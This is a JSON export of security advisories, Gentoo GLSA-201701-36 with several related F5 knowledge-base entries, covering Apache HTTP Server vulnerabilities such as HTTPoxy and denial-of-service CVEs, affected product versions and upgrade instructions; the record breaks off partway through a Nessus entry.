{"edition": 1, "title": "Apache: Multiple vulnerabilities", "bulletinFamily": "unix", "published": "2017-01-15T00:00:00", "lastseen": "2017-01-15T08:59:41", "modified": "2017-01-15T00:00:00", "reporter": "Gentoo Foundation", "viewCount": 47, "href": "https://security.gentoo.org/glsa/201701-36", "description": "### Background\n\nThe Apache HTTP server is one of the most popular web servers on the Internet. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Apache. Please review the CVE identifiers, upstream Apache Software Foundation documentation, and HTTPoxy website referenced below for details. \n\n### Impact\n\nA remote attacker could cause a Denial of Service condition via multiple vectors or response splitting and cache pollution. Additionally, an attacker could intercept unsecured (HTTP) transmissions via the HTTPoxy vulnerability. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.4.25\"", "type": "gentoo", "references": ["https://httpoxy.org/", "https://bugs.gentoo.org/show_bug.cgi?id=601736", "https://www.apache.org/security/asf-httpoxy-response.txt", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8740", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0736", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8073", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3583", "https://bugs.gentoo.org/show_bug.cgi?id=589226", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8743", "https://bugs.gentoo.org/show_bug.cgi?id=603130", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5387", "https://bugs.gentoo.org/show_bug.cgi?id=529130", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2161"], "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-01-15T08:59:41", "rev": 2}, "dependencies": {"references": [{"type": "f5", "idList": ["SOL80513384", "F5:K00373024", "F5:K16847", "SOL16847", "F5:K32071141", "F5:K80513384", "F5:K53437580"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_862D6AB3C75E11E69F9820CF30E32F6D.NASL", "APACHE_2_4_25.NASL", "EULEROS_SA-2017-1086.NASL", "SLACKWARE_SSA_2016-358-01.NASL", "SECURITYCENTER_APACHE_2_4_25.NASL", "SUSE_SU-2017-0797-1.NASL", "UBUNTU_USN-3279-1.NASL", "GENTOO_GLSA-201701-36.NASL", "SL_20170412_HTTPD_ON_SL7_X.NASL", "SUSE_SU-2017-0801-1.NASL"]}, {"type": "slackware", "idList": ["SSA-2016-358-01"]}, {"type": "freebsd", "idList": ["862D6AB3-C75E-11E6-9F98-20CF30E32F6D"]}, {"type": "cve", "idList": ["CVE-2016-8740", "CVE-2016-5387", "CVE-2014-3583", "CVE-2016-8743", "CVE-2016-0736", "CVE-2016-8073", "CVE-2016-2161"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-1421", "ELSA-2016-1422", "ELSA-2017-0906"]}, {"type": "amazon", "idList": ["ALAS-2016-725", "ALAS-2017-785"]}, {"type": "ubuntu", "idList": ["USN-3279-1", "USN-3038-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-553-1:43AA7", "DEBIAN:DSA-3796-1:1E6E3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220171085", "OPENVAS:1361412562310703796", "OPENVAS:1361412562310872185", "OPENVAS:1361412562310872183", "OPENVAS:703796", "OPENVAS:1361412562310843156", "OPENVAS:1361412562310882692", "OPENVAS:1361412562310871799", "OPENVAS:1361412562310805636", "OPENVAS:1361412562311220171086"]}, {"type": "fedora", "idList": ["FEDORA:B2E586062CBD", "FEDORA:2AA4A608C00E", "FEDORA:D0BC06087BAD", "FEDORA:296366094919", "FEDORA:A9BA0608752F", "FEDORA:09EE06061CB6"]}, {"type": "redhat", "idList": ["RHSA-2015:1855", "RHSA-2017:1414", "RHSA-2017:1415", "RHSA-2016:1851", "RHSA-2016:1422", "RHSA-2017:0906", "RHSA-2015:1858", "RHSA-2017:1161", "RHSA-2016:1421", "RHSA-2017:1413"]}, {"type": "centos", "idList": ["CESA-2016:1421", "CESA-2017:0906", "CESA-2016:1422"]}, {"type": "hackerone", "idList": ["H1:36264"]}, {"type": "httpd", "idList": ["HTTPD:79096CA36FAE041205EFAB66A6D4EF4B", "HTTPD:BC9D721F4559FBD6CD9FC08B4A702A04", "HTTPD:000FDE4E492EE77384DAD86EE8D97E4D", "HTTPD:CE14FA5A5B1A2BE3A35EA809C9D8CFF7"]}], "modified": "2017-01-15T08:59:41", "rev": 2}, "vulnersScore": 6.4}, "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 5.1}, "cvelist": ["CVE-2016-2161", "CVE-2014-3583", "CVE-2016-8743", "CVE-2016-8073", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "affectedPackage": [{"OSVersion": "any", "OS": "Gentoo", "packageName": "www-servers/apache", "arch": "all", "operator": "lt", "packageVersion": "2.4.25", "packageFilename": "UNKNOWN"}], "id": "GLSA-201701-36"}

{"f5": [{"lastseen": "2018-09-13T21:51:45", "bulletinFamily": "software", "cvelist": ["CVE-2016-2161", "CVE-2016-0736"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-08-03T18:02:00", "published": "2017-02-01T19:12:00", "id": "F5:K53437580", "href": "https://support.f5.com/csp/article/K53437580", "title": "Apache vulnerabilities CVE-2016-0736 and CVE-2016-2161", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-04-06T22:39:34", "bulletinFamily": "software", "cvelist": ["CVE-2016-8743"], "description": "\nF5 Product Development has assigned ID 641101 (BIG-IP), ID 641323 (Enterprise Manager), and ID 431234 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H00373024 on the **Diagnostics** &gt; **Identified** &gt; **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP AAM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP AFM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP Analytics | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP APM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP ASM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP DNS | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP Edge Gateway | 11.2.1 | None | Low | Apache **httpd** process \nBIG-IP GTM | 11.4.0 - 11.6.5 \n11.2.1 | None | Low | Apache **httpd** process \nBIG-IP Link Controller | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP PEM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | Apache **httpd** process \nBIG-IP WebAccelerator | 11.2.1 | None | Low | Apache **httpd** process \nBIG-IP WebSafe | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.6.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nARX | 6.2.0 - 6.4.0 | None | Low | Apache **httpd** process, Management API (disabled by default) \nEnterprise Manager | 3.1.1 | None | Low | Apache **httpd** process \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable1 | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable1 | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable1 | None \nF5 iWorkflow | None | 2.0.0 - 2.0.2 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nBIG-IP and Enterprise Manager\n\nTo mitigate this vulnerability, you should limit access to the Configuration utility to use only secure networks.\n\nARX\n\nTo mitigate this vulnerability, you should limit access to the ARX GUI to use only secure networks. Additionally, you should avoid enabling the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2020-03-16T20:15:00", "published": "2017-02-04T02:10:00", "id": "F5:K00373024", "href": "https://support.f5.com/csp/article/K00373024", "title": "Apache vulnerability CVE-2016-8743", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-06-08T00:16:28", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-12-09T23:06:00", "published": "2016-12-09T23:06:00", "href": "https://support.f5.com/csp/article/K32071141", "id": "F5:K32071141", "type": "f5", "title": "Apache mod_http2 vulnerability CVE-2016-8740", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-20T21:07:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-5387"], "description": "\nF5 Product Development has assigned ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Low| Apache HTTP server \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n", "edition": 1, "modified": "2017-03-14T19:09:00", "published": "2016-08-02T21:36:00", "id": "F5:K80513384", "href": "https://support.f5.com/csp/article/K80513384", "title": "Apache HTTPD vulnerability CVE-2016-5387", "type": "f5", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:06", "bulletinFamily": "software", "cvelist": ["CVE-2016-5387"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL12766: ARX hotfix matrix\n", "edition": 1, "modified": "2016-08-02T00:00:00", "published": "2016-08-02T00:00:00", "id": "SOL80513384", "href": "http://support.f5.com/kb/en-us/solutions/public/k/80/sol80513384.html", "type": "f5", "title": "SOL80513384 - Apache HTTPD vulnerability CVE-2016-5387", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:18", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583", "CVE-2014-3581", "CVE-2014-8109"], "edition": 1, "description": "Description \n\n\n * [CVE-2014-8109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8109>) \n \nmod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory. \n \n\n * [CVE-2014-3581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3581>) \n \nThe cache_merge_headers_out function in modules/cache/cache_util.c in the mod_cache module in the Apache HTTP Server before 2.4.11 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty HTTP Content-Type header. \n \n\n * [CVE-2014-3583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3583>) \n \nThe handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers. \n\n\nImpact \n\n\nThere is no impact; F5 products are not affected by these vulnerabilities.\n\nStatus\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | None \n| 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \n \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nLineRate | None \n| 2.5.0 - 2.6.0 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | None \n| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable | None \n \n \nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nSupplemental Information\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2016-01-09T02:23:00", "published": "2015-07-03T00:14:00", "id": "F5:K16847", "href": "https://support.f5.com/csp/article/K16847", "title": "Apache vulnerabilities CVE-2014-8109, CVE-2014-3581, CVE-2014-3583", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:30", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583", "CVE-2014-3581", "CVE-2014-8109"], "edition": 1, "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n", "modified": "2015-07-02T00:00:00", "published": "2015-07-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16847.html", "id": "SOL16847", "title": "SOL16847 - Apache vulnerabilities CVE-2014-8109, CVE-2014-3581, CVE-2014-3583", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T11:05:38", "description": "The remote host is affected by the vulnerability described in GLSA-201701-36\n(Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache. Please review\n the CVE identifiers, upstream Apache Software Foundation documentation,\n and HTTPoxy website referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition via multiple\n vectors or response splitting and cache pollution. Additionally, an\n attacker could intercept unsecured (HTTP) transmissions via the HTTPoxy\n vulnerability.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 8.1, "vector": 